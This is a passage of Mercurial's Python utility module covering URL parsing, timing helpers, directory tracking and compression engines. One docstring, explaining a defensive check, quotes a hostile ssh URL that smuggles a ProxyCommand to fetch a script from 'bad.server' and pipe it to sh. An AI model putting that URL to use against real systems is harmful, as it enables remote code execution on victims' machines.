2678 2690 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2679 2691
2680 2692 Query strings and fragments:
2681 2693
2682 2694 >>> url(b'http://host/a?b#c')
2683 2695 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2684 2696 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2685 2697 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2686 2698
2687 2699 Empty path:
2688 2700
2689 2701 >>> url(b'')
2690 2702 <url path: ''>
2691 2703 >>> url(b'#a')
2692 2704 <url path: '', fragment: 'a'>
2693 2705 >>> url(b'http://host/')
2694 2706 <url scheme: 'http', host: 'host', path: ''>
2695 2707 >>> url(b'http://host/#a')
2696 2708 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2697 2709
2698 2710 Only scheme:
2699 2711
2700 2712 >>> url(b'http:')
2701 2713 <url scheme: 'http'>
2702 2714 """
2703 2715
2704 2716 _safechars = "!~*'()+"
2705 2717 _safepchars = "/!~*'()+:\\"
2706 2718 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2707 2719
2708 2720 def __init__(self, path, parsequery=True, parsefragment=True):
2709 2721 # We slowly chomp away at path until we have only the path left
2710 2722 self.scheme = self.user = self.passwd = self.host = None
2711 2723 self.port = self.path = self.query = self.fragment = None
2712 2724 self._localpath = True
2713 2725 self._hostport = ''
2714 2726 self._origpath = path
2715 2727
2716 2728 if parsefragment and '#' in path:
2717 2729 path, self.fragment = path.split('#', 1)
2718 2730
2719 2731 # special case for Windows drive letters and UNC paths
2720 2732 if hasdriveletter(path) or path.startswith('\\\\'):
2721 2733 self.path = path
2722 2734 return
2723 2735
2724 2736 # For compatibility reasons, we can't handle bundle paths as
2725 2737 # normal URLS
2726 2738 if path.startswith('bundle:'):
2727 2739 self.scheme = 'bundle'
2728 2740 path = path[7:]
2729 2741 if path.startswith('//'):
2730 2742 path = path[2:]
2731 2743 self.path = path
2732 2744 return
2733 2745
2734 2746 if self._matchscheme(path):
2735 2747 parts = path.split(':', 1)
2736 2748 if parts[0]:
2737 2749 self.scheme, path = parts
2738 2750 self._localpath = False
2739 2751
2740 2752 if not path:
2741 2753 path = None
2742 2754 if self._localpath:
2743 2755 self.path = ''
2744 2756 return
2745 2757 else:
2746 2758 if self._localpath:
2747 2759 self.path = path
2748 2760 return
2749 2761
2750 2762 if parsequery and '?' in path:
2751 2763 path, self.query = path.split('?', 1)
2752 2764 if not path:
2753 2765 path = None
2754 2766 if not self.query:
2755 2767 self.query = None
2756 2768
2757 2769 # // is required to specify a host/authority
2758 2770 if path and path.startswith('//'):
2759 2771 parts = path[2:].split('/', 1)
2760 2772 if len(parts) > 1:
2761 2773 self.host, path = parts
2762 2774 else:
2763 2775 self.host = parts[0]
2764 2776 path = None
2765 2777 if not self.host:
2766 2778 self.host = None
2767 2779 # path of file:///d is /d
2768 2780 # path of file:///d:/ is d:/, not /d:/
2769 2781 if path and not hasdriveletter(path):
2770 2782 path = '/' + path
2771 2783
2772 2784 if self.host and '@' in self.host:
2773 2785 self.user, self.host = self.host.rsplit('@', 1)
2774 2786 if ':' in self.user:
2775 2787 self.user, self.passwd = self.user.split(':', 1)
2776 2788 if not self.host:
2777 2789 self.host = None
2778 2790
2779 2791 # Don't split on colons in IPv6 addresses without ports
2780 2792 if (self.host and ':' in self.host and
2781 2793 not (self.host.startswith('[') and self.host.endswith(']'))):
2782 2794 self._hostport = self.host
2783 2795 self.host, self.port = self.host.rsplit(':', 1)
2784 2796 if not self.host:
2785 2797 self.host = None
2786 2798
2787 2799 if (self.host and self.scheme == 'file' and
2788 2800 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2789 2801 raise Abort(_('file:// URLs can only refer to localhost'))
2790 2802
2791 2803 self.path = path
2792 2804
2793 2805 # leave the query string escaped
2794 2806 for a in ('user', 'passwd', 'host', 'port',
2795 2807 'path', 'fragment'):
2796 2808 v = getattr(self, a)
2797 2809 if v is not None:
2798 2810 setattr(self, a, urlreq.unquote(v))
2799 2811
2800 2812 @encoding.strmethod
2801 2813 def __repr__(self):
2802 2814 attrs = []
2803 2815 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2804 2816 'query', 'fragment'):
2805 2817 v = getattr(self, a)
2806 2818 if v is not None:
2807 2819 attrs.append('%s: %r' % (a, v))
2808 2820 return '<url %s>' % ', '.join(attrs)
2809 2821
2810 2822 def __bytes__(self):
2811 2823 r"""Join the URL's components back into a URL string.
2812 2824
2813 2825 Examples:
2814 2826
2815 2827 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2816 2828 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2817 2829 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2818 2830 'http://user:pw@host:80/?foo=bar&baz=42'
2819 2831 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2820 2832 'http://user:pw@host:80/?foo=bar%3dbaz'
2821 2833 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2822 2834 'ssh://user:pw@[::1]:2200//home/joe#'
2823 2835 >>> bytes(url(b'http://localhost:80//'))
2824 2836 'http://localhost:80//'
2825 2837 >>> bytes(url(b'http://localhost:80/'))
2826 2838 'http://localhost:80/'
2827 2839 >>> bytes(url(b'http://localhost:80'))
2828 2840 'http://localhost:80/'
2829 2841 >>> bytes(url(b'bundle:foo'))
2830 2842 'bundle:foo'
2831 2843 >>> bytes(url(b'bundle://../foo'))
2832 2844 'bundle:../foo'
2833 2845 >>> bytes(url(b'path'))
2834 2846 'path'
2835 2847 >>> bytes(url(b'file:///tmp/foo/bar'))
2836 2848 'file:///tmp/foo/bar'
2837 2849 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2838 2850 'file:///c:/tmp/foo/bar'
2839 2851 >>> print(url(br'bundle:foo\bar'))
2840 2852 bundle:foo\bar
2841 2853 >>> print(url(br'file:///D:\data\hg'))
2842 2854 file:///D:\data\hg
2843 2855 """
2844 2856 if self._localpath:
2845 2857 s = self.path
2846 2858 if self.scheme == 'bundle':
2847 2859 s = 'bundle:' + s
2848 2860 if self.fragment:
2849 2861 s += '#' + self.fragment
2850 2862 return s
2851 2863
2852 2864 s = self.scheme + ':'
2853 2865 if self.user or self.passwd or self.host:
2854 2866 s += '//'
2855 2867 elif self.scheme and (not self.path or self.path.startswith('/')
2856 2868 or hasdriveletter(self.path)):
2857 2869 s += '//'
2858 2870 if hasdriveletter(self.path):
2859 2871 s += '/'
2860 2872 if self.user:
2861 2873 s += urlreq.quote(self.user, safe=self._safechars)
2862 2874 if self.passwd:
2863 2875 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2864 2876 if self.user or self.passwd:
2865 2877 s += '@'
2866 2878 if self.host:
2867 2879 if not (self.host.startswith('[') and self.host.endswith(']')):
2868 2880 s += urlreq.quote(self.host)
2869 2881 else:
2870 2882 s += self.host
2871 2883 if self.port:
2872 2884 s += ':' + urlreq.quote(self.port)
2873 2885 if self.host:
2874 2886 s += '/'
2875 2887 if self.path:
2876 2888 # TODO: similar to the query string, we should not unescape the
2877 2889 # path when we store it, the path might contain '%2f' = '/',
2878 2890 # which we should *not* escape.
2879 2891 s += urlreq.quote(self.path, safe=self._safepchars)
2880 2892 if self.query:
2881 2893 # we store the query in escaped form.
2882 2894 s += '?' + self.query
2883 2895 if self.fragment is not None:
2884 2896 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2885 2897 return s
2886 2898
2887 2899 __str__ = encoding.strmethod(__bytes__)
2888 2900
2889 2901 def authinfo(self):
2890 2902 user, passwd = self.user, self.passwd
2891 2903 try:
2892 2904 self.user, self.passwd = None, None
2893 2905 s = bytes(self)
2894 2906 finally:
2895 2907 self.user, self.passwd = user, passwd
2896 2908 if not self.user:
2897 2909 return (s, None)
2898 2910 # authinfo[1] is passed to urllib2 password manager, and its
2899 2911 # URIs must not contain credentials. The host is passed in the
2900 2912 # URIs list because Python < 2.4.3 uses only that to search for
2901 2913 # a password.
2902 2914 return (s, (None, (s, self.host),
2903 2915 self.user, self.passwd or ''))
2904 2916
2905 2917 def isabs(self):
2906 2918 if self.scheme and self.scheme != 'file':
2907 2919 return True # remote URL
2908 2920 if hasdriveletter(self.path):
2909 2921 return True # absolute for our purposes - can't be joined()
2910 2922 if self.path.startswith(br'\\'):
2911 2923 return True # Windows UNC path
2912 2924 if self.path.startswith('/'):
2913 2925 return True # POSIX-style
2914 2926 return False
2915 2927
2916 2928 def localpath(self):
2917 2929 if self.scheme == 'file' or self.scheme == 'bundle':
2918 2930 path = self.path or '/'
2919 2931 # For Windows, we need to promote hosts containing drive
2920 2932 # letters to paths with drive letters.
2921 2933 if hasdriveletter(self._hostport):
2922 2934 path = self._hostport + '/' + self.path
2923 2935 elif (self.host is not None and self.path
2924 2936 and not hasdriveletter(path)):
2925 2937 path = '/' + path
2926 2938 return path
2927 2939 return self._origpath
2928 2940
2929 2941 def islocal(self):
2930 2942 '''whether localpath will return something that posixfile can open'''
2931 2943 return (not self.scheme or self.scheme == 'file'
2932 2944 or self.scheme == 'bundle')
2933 2945
2934 2946 def hasscheme(path):
2935 2947 return bool(url(path).scheme)
2936 2948
2937 2949 def hasdriveletter(path):
2938 2950 return path and path[1:2] == ':' and path[0:1].isalpha()
2939 2951
2940 2952 def urllocalpath(path):
2941 2953 return url(path, parsequery=False, parsefragment=False).localpath()
2942 2954
2943 2955 def checksafessh(path):
2944 2956 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2945 2957
2946 2958 This is a sanity check for ssh urls. ssh will parse the first item as
2947 2959 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2948 2960 Let's prevent these potentially exploited urls entirely and warn the
2949 2961 user.
2950 2962
2951 2963 Raises an error.Abort when the url is unsafe.
2952 2964 """
2953 2965 path = urlreq.unquote(path)
2954 2966 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2955 2967 raise error.Abort(_('potentially unsafe url: %r') %
2956 2968 (path,))
2957 2969
2958 2970 def hidepassword(u):
2959 2971 '''hide user credential in a url string'''
2960 2972 u = url(u)
2961 2973 if u.passwd:
2962 2974 u.passwd = '***'
2963 2975 return bytes(u)
2964 2976
2965 2977 def removeauth(u):
2966 2978 '''remove all authentication information from a url string'''
2967 2979 u = url(u)
2968 2980 u.user = u.passwd = None
2969 2981 return str(u)
2970 2982
2971 2983 timecount = unitcountfn(
2972 2984 (1, 1e3, _('%.0f s')),
2973 2985 (100, 1, _('%.1f s')),
2974 2986 (10, 1, _('%.2f s')),
2975 2987 (1, 1, _('%.3f s')),
2976 2988 (100, 0.001, _('%.1f ms')),
2977 2989 (10, 0.001, _('%.2f ms')),
2978 2990 (1, 0.001, _('%.3f ms')),
2979 2991 (100, 0.000001, _('%.1f us')),
2980 2992 (10, 0.000001, _('%.2f us')),
2981 2993 (1, 0.000001, _('%.3f us')),
2982 2994 (100, 0.000000001, _('%.1f ns')),
2983 2995 (10, 0.000000001, _('%.2f ns')),
2984 2996 (1, 0.000000001, _('%.3f ns')),
2985 2997 )
2986 2998
2987 2999 _timenesting = [0]
2988 3000
2989 3001 def timed(func):
2990 3002 '''Report the execution time of a function call to stderr.
2991 3003
2992 3004 During development, use as a decorator when you need to measure
2993 3005 the cost of a function, e.g. as follows:
2994 3006
2995 3007 @util.timed
2996 3008 def foo(a, b, c):
2997 3009 pass
2998 3010 '''
2999 3011
3000 3012 def wrapper(*args, **kwargs):
3001 3013 start = timer()
3002 3014 indent = 2
3003 3015 _timenesting[0] += indent
3004 3016 try:
3005 3017 return func(*args, **kwargs)
3006 3018 finally:
3007 3019 elapsed = timer() - start
3008 3020 _timenesting[0] -= indent
3009 3021 stderr.write('%s%s: %s\n' %
3010 3022 (' ' * _timenesting[0], func.__name__,
3011 3023 timecount(elapsed)))
3012 3024 return wrapper
3013 3025
3014 3026 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3015 3027 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3016 3028
3017 3029 def sizetoint(s):
3018 3030 '''Convert a space specifier to a byte count.
3019 3031
3020 3032 >>> sizetoint(b'30')
3021 3033 30
3022 3034 >>> sizetoint(b'2.2kb')
3023 3035 2252
3024 3036 >>> sizetoint(b'6M')
3025 3037 6291456
3026 3038 '''
3027 3039 t = s.strip().lower()
3028 3040 try:
3029 3041 for k, u in _sizeunits:
3030 3042 if t.endswith(k):
3031 3043 return int(float(t[:-len(k)]) * u)
3032 3044 return int(t)
3033 3045 except ValueError:
3034 3046 raise error.ParseError(_("couldn't parse size: %s") % s)
3035 3047
3036 3048 class hooks(object):
3037 3049 '''A collection of hook functions that can be used to extend a
3038 3050 function's behavior. Hooks are called in lexicographic order,
3039 3051 based on the names of their sources.'''
3040 3052
3041 3053 def __init__(self):
3042 3054 self._hooks = []
3043 3055
3044 3056 def add(self, source, hook):
3045 3057 self._hooks.append((source, hook))
3046 3058
3047 3059 def __call__(self, *args):
3048 3060 self._hooks.sort(key=lambda x: x[0])
3049 3061 results = []
3050 3062 for source, hook in self._hooks:
3051 3063 results.append(hook(*args))
3052 3064 return results
3053 3065
3054 3066 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3055 3067 '''Yields lines for a nicely formatted stacktrace.
3056 3068 Skips the 'skip' last entries, then return the last 'depth' entries.
3057 3069 Each file+linenumber is formatted according to fileline.
3058 3070 Each line is formatted according to line.
3059 3071 If line is None, it yields:
3060 3072 length of longest filepath+line number,
3061 3073 filepath+linenumber,
3062 3074 function
3063 3075
3064 3076 Not be used in production code but very convenient while developing.
3065 3077 '''
3066 3078 entries = [(fileline % (fn, ln), func)
3067 3079 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3068 3080 ][-depth:]
3069 3081 if entries:
3070 3082 fnmax = max(len(entry[0]) for entry in entries)
3071 3083 for fnln, func in entries:
3072 3084 if line is None:
3073 3085 yield (fnmax, fnln, func)
3074 3086 else:
3075 3087 yield line % (fnmax, fnln, func)
3076 3088
3077 3089 def debugstacktrace(msg='stacktrace', skip=0,
3078 3090 f=stderr, otherf=stdout, depth=0):
3079 3091 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3080 3092 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3081 3093 By default it will flush stdout first.
3082 3094 It can be used everywhere and intentionally does not require an ui object.
3083 3095 Not be used in production code but very convenient while developing.
3084 3096 '''
3085 3097 if otherf:
3086 3098 otherf.flush()
3087 3099 f.write('%s at:\n' % msg.rstrip())
3088 3100 for line in getstackframes(skip + 1, depth=depth):
3089 3101 f.write(line)
3090 3102 f.flush()
3091 3103
3092 3104 class dirs(object):
3093 3105 '''a multiset of directory names from a dirstate or manifest'''
3094 3106
3095 3107 def __init__(self, map, skip=None):
3096 3108 self._dirs = {}
3097 3109 addpath = self.addpath
3098 3110 if safehasattr(map, 'iteritems') and skip is not None:
3099 3111 for f, s in map.iteritems():
3100 3112 if s[0] != skip:
3101 3113 addpath(f)
3102 3114 else:
3103 3115 for f in map:
3104 3116 addpath(f)
3105 3117
3106 3118 def addpath(self, path):
3107 3119 dirs = self._dirs
3108 3120 for base in finddirs(path):
3109 3121 if base in dirs:
3110 3122 dirs[base] += 1
3111 3123 return
3112 3124 dirs[base] = 1
3113 3125
3114 3126 def delpath(self, path):
3115 3127 dirs = self._dirs
3116 3128 for base in finddirs(path):
3117 3129 if dirs[base] > 1:
3118 3130 dirs[base] -= 1
3119 3131 return
3120 3132 del dirs[base]
3121 3133
3122 3134 def __iter__(self):
3123 3135 return iter(self._dirs)
3124 3136
3125 3137 def __contains__(self, d):
3126 3138 return d in self._dirs
3127 3139
3128 3140 if safehasattr(parsers, 'dirs'):
3129 3141 dirs = parsers.dirs
3130 3142
3131 3143 def finddirs(path):
3132 3144 pos = path.rfind('/')
3133 3145 while pos != -1:
3134 3146 yield path[:pos]
3135 3147 pos = path.rfind('/', 0, pos)
3136 3148
3137 3149 # compression code
3138 3150
3139 3151 SERVERROLE = 'server'
3140 3152 CLIENTROLE = 'client'
3141 3153
3142 3154 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3143 3155 (u'name', u'serverpriority',
3144 3156 u'clientpriority'))
3145 3157
3146 3158 class compressormanager(object):
3147 3159 """Holds registrations of various compression engines.
3148 3160
3149 3161 This class essentially abstracts the differences between compression
3150 3162 engines to allow new compression formats to be added easily, possibly from
3151 3163 extensions.
3152 3164
3153 3165 Compressors are registered against the global instance by calling its
3154 3166 ``register()`` method.
3155 3167 """
3156 3168 def __init__(self):
3157 3169 self._engines = {}
3158 3170 # Bundle spec human name to engine name.
3159 3171 self._bundlenames = {}
3160 3172 # Internal bundle identifier to engine name.
3161 3173 self._bundletypes = {}
3162 3174 # Revlog header to engine name.
3163 3175 self._revlogheaders = {}
3164 3176 # Wire proto identifier to engine name.
3165 3177 self._wiretypes = {}
3166 3178
3167 3179 def __getitem__(self, key):
3168 3180 return self._engines[key]
3169 3181
3170 3182 def __contains__(self, key):
3171 3183 return key in self._engines
3172 3184
3173 3185 def __iter__(self):
3174 3186 return iter(self._engines.keys())
3175 3187
3176 3188 def register(self, engine):
3177 3189 """Register a compression engine with the manager.
3178 3190
3179 3191 The argument must be a ``compressionengine`` instance.
3180 3192 """
3181 3193 if not isinstance(engine, compressionengine):
3182 3194 raise ValueError(_('argument must be a compressionengine'))
3183 3195
3184 3196 name = engine.name()
3185 3197
3186 3198 if name in self._engines:
3187 3199 raise error.Abort(_('compression engine %s already registered') %
3188 3200 name)
3189 3201
3190 3202 bundleinfo = engine.bundletype()
3191 3203 if bundleinfo:
3192 3204 bundlename, bundletype = bundleinfo
3193 3205
3194 3206 if bundlename in self._bundlenames:
3195 3207 raise error.Abort(_('bundle name %s already registered') %
3196 3208 bundlename)
3197 3209 if bundletype in self._bundletypes:
3198 3210 raise error.Abort(_('bundle type %s already registered by %s') %
3199 3211 (bundletype, self._bundletypes[bundletype]))
3200 3212
3201 3213 # No external facing name declared.
3202 3214 if bundlename:
3203 3215 self._bundlenames[bundlename] = name
3204 3216
3205 3217 self._bundletypes[bundletype] = name
3206 3218
3207 3219 wiresupport = engine.wireprotosupport()
3208 3220 if wiresupport:
3209 3221 wiretype = wiresupport.name
3210 3222 if wiretype in self._wiretypes:
3211 3223 raise error.Abort(_('wire protocol compression %s already '
3212 3224 'registered by %s') %
3213 3225 (wiretype, self._wiretypes[wiretype]))
3214 3226
3215 3227 self._wiretypes[wiretype] = name
3216 3228
3217 3229 revlogheader = engine.revlogheader()
3218 3230 if revlogheader and revlogheader in self._revlogheaders:
3219 3231 raise error.Abort(_('revlog header %s already registered by %s') %
3220 3232 (revlogheader, self._revlogheaders[revlogheader]))
3221 3233
3222 3234 if revlogheader:
3223 3235 self._revlogheaders[revlogheader] = name
3224 3236
3225 3237 self._engines[name] = engine
3226 3238
3227 3239 @property
3228 3240 def supportedbundlenames(self):
3229 3241 return set(self._bundlenames.keys())
3230 3242
3231 3243 @property
3232 3244 def supportedbundletypes(self):
3233 3245 return set(self._bundletypes.keys())
3234 3246
3235 3247 def forbundlename(self, bundlename):
3236 3248 """Obtain a compression engine registered to a bundle name.
3237 3249
3238 3250 Will raise KeyError if the bundle type isn't registered.
3239 3251
3240 3252 Will abort if the engine is known but not available.
3241 3253 """
3242 3254 engine = self._engines[self._bundlenames[bundlename]]
3243 3255 if not engine.available():
3244 3256 raise error.Abort(_('compression engine %s could not be loaded') %
3245 3257 engine.name())
3246 3258 return engine
3247 3259
3248 3260 def forbundletype(self, bundletype):
3249 3261 """Obtain a compression engine registered to a bundle type.
3250 3262
3251 3263 Will raise KeyError if the bundle type isn't registered.
3252 3264
3253 3265 Will abort if the engine is known but not available.
3254 3266 """
3255 3267 engine = self._engines[self._bundletypes[bundletype]]
3256 3268 if not engine.available():
3257 3269 raise error.Abort(_('compression engine %s could not be loaded') %
3258 3270 engine.name())
3259 3271 return engine
3260 3272
3261 3273 def supportedwireengines(self, role, onlyavailable=True):
3262 3274 """Obtain compression engines that support the wire protocol.
3263 3275
3264 3276 Returns a list of engines in prioritized order, most desired first.
3265 3277
3266 3278 If ``onlyavailable`` is set, filter out engines that can't be
3267 3279 loaded.
3268 3280 """
3269 3281 assert role in (SERVERROLE, CLIENTROLE)
3270 3282
3271 3283 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3272 3284
3273 3285 engines = [self._engines[e] for e in self._wiretypes.values()]
3274 3286 if onlyavailable:
3275 3287 engines = [e for e in engines if e.available()]
3276 3288
3277 3289 def getkey(e):
3278 3290 # Sort first by priority, highest first. In case of tie, sort
3279 3291 # alphabetically. This is arbitrary, but ensures output is
3280 3292 # stable.
3281 3293 w = e.wireprotosupport()
3282 3294 return -1 * getattr(w, attr), w.name
3283 3295
3284 3296 return list(sorted(engines, key=getkey))
3285 3297
3286 3298 def forwiretype(self, wiretype):
3287 3299 engine = self._engines[self._wiretypes[wiretype]]
3288 3300 if not engine.available():
3289 3301 raise error.Abort(_('compression engine %s could not be loaded') %
3290 3302 engine.name())
3291 3303 return engine
3292 3304
3293 3305 def forrevlogheader(self, header):
3294 3306 """Obtain a compression engine registered to a revlog header.
3295 3307
3296 3308 Will raise KeyError if the revlog header value isn't registered.
3297 3309 """
3298 3310 return self._engines[self._revlogheaders[header]]
3299 3311
3300 3312 compengines = compressormanager()
3301 3313
3302 3314 class compressionengine(object):
3303 3315 """Base class for compression engines.
3304 3316
3305 3317 Compression engines must implement the interface defined by this class.
3306 3318 """
3307 3319 def name(self):
3308 3320 """Returns the name of the compression engine.
3309 3321
3310 3322 This is the key the engine is registered under.
3311 3323
3312 3324 This method must be implemented.
3313 3325 """
3314 3326 raise NotImplementedError()
3315 3327
3316 3328 def available(self):
3317 3329 """Whether the compression engine is available.
3318 3330
3319 3331 The intent of this method is to allow optional compression engines
3320 3332 that may not be available in all installations (such as engines relying
3321 3333 on C extensions that may not be present).
3322 3334 """
3323 3335 return True
3324 3336
3325 3337 def bundletype(self):
3326 3338 """Describes bundle identifiers for this engine.
3327 3339
3328 3340 If this compression engine isn't supported for bundles, returns None.
3329 3341
3330 3342 If this engine can be used for bundles, returns a 2-tuple of strings of
3331 3343 the user-facing "bundle spec" compression name and an internal
3332 3344 identifier used to denote the compression format within bundles. To
3333 3345 exclude the name from external usage, set the first element to ``None``.
3334 3346
3335 3347 If bundle compression is supported, the class must also implement
3336 3348 ``compressstream`` and `decompressorreader``.
3337 3349
3338 3350 The docstring of this method is used in the help system to tell users
3339 3351 about this engine.
3340 3352 """
3341 3353 return None
3342 3354
3343 3355 def wireprotosupport(self):
3344 3356 """Declare support for this compression format on the wire protocol.
3345 3357
3346 3358 If this compression engine isn't supported for compressing wire
3347 3359 protocol payloads, returns None.
3348 3360
3349 3361 Otherwise, returns ``compenginewireprotosupport`` with the following
3350 3362 fields:
3351 3363
3352 3364 * String format identifier
3353 3365 * Integer priority for the server
3354 3366 * Integer priority for the client
3355 3367
3356 3368 The integer priorities are used to order the advertisement of format
3357 3369 support by server and client. The highest integer is advertised
3358 3370 first. Integers with non-positive values aren't advertised.
3359 3371
3360 3372 The priority values are somewhat arbitrary and only used for default
3361 3373 ordering. The relative order can be changed via config options.
3362 3374
3363 3375 If wire protocol compression is supported, the class must also implement
3364 3376 ``compressstream`` and ``decompressorreader``.
3365 3377 """
3366 3378 return None
3367 3379
3368 3380 def revlogheader(self):
3369 3381 """Header added to revlog chunks that identifies this engine.
3370 3382
3371 3383 If this engine can be used to compress revlogs, this method should
3372 3384 return the bytes used to identify chunks compressed with this engine.
3373 3385 Else, the method should return ``None`` to indicate it does not
3374 3386 participate in revlog compression.
3375 3387 """
3376 3388 return None
3377 3389
3378 3390 def compressstream(self, it, opts=None):
3379 3391 """Compress an iterator of chunks.
3380 3392
3381 3393 The method receives an iterator (ideally a generator) of chunks of
3382 3394 bytes to be compressed. It returns an iterator (ideally a generator)
3383 3395 of bytes of chunks representing the compressed output.
3384 3396
3385 3397 Optionally accepts an argument defining how to perform compression.
3386 3398 Each engine treats this argument differently.
3387 3399 """
3388 3400 raise NotImplementedError()
3389 3401
3390 3402 def decompressorreader(self, fh):
3391 3403 """Perform decompression on a file object.
3392 3404
3393 3405 Argument is an object with a ``read(size)`` method that returns
3394 3406 compressed data. Return value is an object with a ``read(size)`` that
3395 3407 returns uncompressed data.
3396 3408 """
3397 3409 raise NotImplementedError()
3398 3410
3399 3411 def revlogcompressor(self, opts=None):
3400 3412 """Obtain an object that can be used to compress revlog entries.
3401 3413
3402 3414 The object has a ``compress(data)`` method that compresses binary
3403 3415 data. This method returns compressed binary data or ``None`` if
3404 3416 the data could not be compressed (too small, not compressible, etc).
3405 3417 The returned data should have a header uniquely identifying this
3406 3418 compression format so decompression can be routed to this engine.
3407 3419 This header should be identified by the ``revlogheader()`` return
3408 3420 value.
3409 3421
3410 3422 The object has a ``decompress(data)`` method that decompresses
3411 3423 data. The method will only be called if ``data`` begins with
3412 3424 ``revlogheader()``. The method should return the raw, uncompressed
3413 3425 data or raise a ``RevlogError``.
3414 3426
3415 3427 The object is reusable but is not thread safe.
3416 3428 """
3417 3429 raise NotImplementedError()
3418 3430
3419 3431 class _zlibengine(compressionengine):
3420 3432 def name(self):
3421 3433 return 'zlib'
3422 3434
3423 3435 def bundletype(self):
3424 3436 """zlib compression using the DEFLATE algorithm.
3425 3437
3426 3438 All Mercurial clients should support this format. The compression
3427 3439 algorithm strikes a reasonable balance between compression ratio
3428 3440 and size.
3429 3441 """
3430 3442 return 'gzip', 'GZ'
3431 3443
3432 3444 def wireprotosupport(self):
3433 3445 return compewireprotosupport('zlib', 20, 20)
3434 3446
3435 3447 def revlogheader(self):
3436 3448 return 'x'
3437 3449
3438 3450 def compressstream(self, it, opts=None):
3439 3451 opts = opts or {}
3440 3452
3441 3453 z = zlib.compressobj(opts.get('level', -1))
3442 3454 for chunk in it:
3443 3455 data = z.compress(chunk)
3444 3456 # Not all calls to compress emit data. It is cheaper to inspect
3445 3457 # here than to feed empty chunks through generator.
3446 3458 if data:
3447 3459 yield data
3448 3460
3449 3461 yield z.flush()
3450 3462
3451 3463 def decompressorreader(self, fh):
3452 3464 def gen():
3453 3465 d = zlib.decompressobj()
3454 3466 for chunk in filechunkiter(fh):
3455 3467 while chunk:
3456 3468 # Limit output size to limit memory.
3457 3469 yield d.decompress(chunk, 2 ** 18)
3458 3470 chunk = d.unconsumed_tail
3459 3471
3460 3472 return chunkbuffer(gen())
3461 3473
3462 3474 class zlibrevlogcompressor(object):
3463 3475 def compress(self, data):
3464 3476 insize = len(data)
3465 3477 # Caller handles empty input case.
3466 3478 assert insize > 0
3467 3479
3468 3480 if insize < 44:
3469 3481 return None
3470 3482
3471 3483 elif insize <= 1000000:
3472 3484 compressed = zlib.compress(data)
3473 3485 if len(compressed) < insize:
3474 3486 return compressed
3475 3487 return None
3476 3488
3477 3489 # zlib makes an internal copy of the input buffer, doubling
3478 3490 # memory usage for large inputs. So do streaming compression
3479 3491 # on large inputs.
3480 3492 else:
3481 3493 z = zlib.compressobj()
3482 3494 parts = []
3483 3495 pos = 0
3484 3496 while pos < insize:
3485 3497 pos2 = pos + 2**20
3486 3498 parts.append(z.compress(data[pos:pos2]))
3487 3499 pos = pos2
3488 3500 parts.append(z.flush())
3489 3501
3490 3502 if sum(map(len, parts)) < insize:
3491 3503 return ''.join(parts)
3492 3504 return None
3493 3505
3494 3506 def decompress(self, data):
3495 3507 try:
3496 3508 return zlib.decompress(data)
3497 3509 except zlib.error as e:
3498 3510 raise error.RevlogError(_('revlog decompress error: %s') %
3499 3511 str(e))
3500 3512
3501 3513 def revlogcompressor(self, opts=None):
3502 3514 return self.zlibrevlogcompressor()
3503 3515
3504 3516 compengines.register(_zlibengine())
3505 3517
3506 3518 class _bz2engine(compressionengine):
3507 3519 def name(self):
3508 3520 return 'bz2'
3509 3521
3510 3522 def bundletype(self):
3511 3523 """An algorithm that produces smaller bundles than ``gzip``.
3512 3524
3513 3525 All Mercurial clients should support this format.
3514 3526
3515 3527 This engine will likely produce smaller bundles than ``gzip`` but
3516 3528 will be significantly slower, both during compression and
3517 3529 decompression.
3518 3530
3519 3531 If available, the ``zstd`` engine can yield similar or better
3520 3532 compression at much higher speeds.
3521 3533 """
3522 3534 return 'bzip2', 'BZ'
3523 3535
3524 3536 # We declare a protocol name but don't advertise by default because
3525 3537 # it is slow.
3526 3538 def wireprotosupport(self):
3527 3539 return compewireprotosupport('bzip2', 0, 0)
3528 3540
3529 3541 def compressstream(self, it, opts=None):
3530 3542 opts = opts or {}
3531 3543 z = bz2.BZ2Compressor(opts.get('level', 9))
3532 3544 for chunk in it:
3533 3545 data = z.compress(chunk)
3534 3546 if data:
3535 3547 yield data
3536 3548
3537 3549 yield z.flush()
3538 3550
3539 3551 def decompressorreader(self, fh):
3540 3552 def gen():
3541 3553 d = bz2.BZ2Decompressor()
3542 3554 for chunk in filechunkiter(fh):
3543 3555 yield d.decompress(chunk)
3544 3556
3545 3557 return chunkbuffer(gen())
3546 3558
3547 3559 compengines.register(_bz2engine())
3548 3560
3549 3561 class _truncatedbz2engine(compressionengine):
3550 3562 def name(self):
3551 3563 return 'bz2truncated'
3552 3564
3553 3565 def bundletype(self):
3554 3566 return None, '_truncatedBZ'
3555 3567
3556 3568 # We don't implement compressstream because it is hackily handled elsewhere.
3557 3569
3558 3570 def decompressorreader(self, fh):
3559 3571 def gen():
3560 3572 # The input stream doesn't have the 'BZ' header. So add it back.
3561 3573 d = bz2.BZ2Decompressor()
3562 3574 d.decompress('BZ')
